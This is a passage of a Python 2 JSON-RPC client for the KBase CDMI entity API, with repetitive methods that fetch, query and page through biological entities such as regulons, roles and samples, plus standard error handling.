ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_ReactionInstance(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_ReactionInstance',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_ReactionInstance(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_ReactionInstance',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_ReactionInstance(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_ReactionInstance',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Regulator(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Regulator',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Regulator(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Regulator',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Regulator(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Regulator',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Regulog(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Regulog',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Regulog(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Regulog',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Regulog(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Regulog',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_RegulogCollection(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_RegulogCollection',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_RegulogCollection(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_RegulogCollection',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_RegulogCollection(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_RegulogCollection',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Regulome(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Regulome',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Regulome(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Regulome',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Regulome(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Regulome',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Regulon(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Regulon',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Regulon(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Regulon',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Regulon(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Regulon',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_ReplicateGroup(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_ReplicateGroup',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_ReplicateGroup(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_ReplicateGroup',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_ReplicateGroup(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_ReplicateGroup',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Role(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Role',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Role(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Role',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Role(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Role',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
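# Usage sketch for the paged all_entities_* accessors (the client instance
# name `cdmi` and the process() helper are illustrative, not part of this
# module). Assuming the CDMI service returns a mapping keyed by entity id,
# an empty result marks the end of the scan:
#
#   offset, page = 0, 100
#   while True:
#       roles = cdmi.all_entities_Role(offset, page, ['description'])
#       if not roles:
#           break
#       for role_id, row in roles.items():
#           process(role_id, row)
#       offset += page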
def get_entity_SSCell(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_SSCell',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_SSCell(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_SSCell',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_SSCell(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_SSCell',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_SSRow(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_SSRow',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_SSRow(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_SSRow',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_SSRow(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_SSRow',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Sample(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Sample',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Sample(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Sample',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Sample(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Sample',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
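# Error-handling sketch: server-reported failures surface as ServerError
# (raised above from the parsed error object), while bad response codes
# raise URLError. A cautious caller might write (`cdmi` and `log` are
# illustrative names):
#
#   try:
#       samples = cdmi.get_entity_Sample(['S1'], ['title'])
#   except ServerError as e:
#       log.warning('CDMI call failed: %s', e)
#   except URLError as e:
#       log.warning('transport problem: %s', e)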
def get_entity_SampleAnnotation(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_SampleAnnotation',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_SampleAnnotation(self, qry, fields):
